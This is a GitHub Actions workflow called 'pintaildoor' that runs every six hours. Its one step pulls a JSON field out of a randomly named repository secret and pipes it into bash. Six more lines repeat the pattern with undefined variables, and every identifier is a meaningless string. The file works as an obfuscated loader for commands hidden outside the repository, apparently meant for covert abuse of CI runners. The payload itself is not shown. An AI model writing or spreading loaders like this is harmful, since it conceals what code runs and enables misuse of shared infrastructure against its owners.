name: pintaildoor
on:
  workflow_dispatch:
  schedule:
    - cron: '6 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: pintaildoor
        env:
          miqk2682: ${{ secrets.miqk2682 }}
        run: |
          echo $miqk2682 | jq -r .vq711 | /bin/bash
          echo $vd22601 | jq -r .ih1 | /bin/bash
          echo $mdugw76 | jq -r .ahwrp97448 | /bin/bash
          echo $mqj132 | jq -r .gmn4 | /bin/bash
          echo $hdtzo90 | jq -r .ogt459 | /bin/bash
          echo $xvu66138 | jq -r .pb4160 | /bin/bash
          echo $rzp05328 | jq -r .mlr0 | /bin/bash

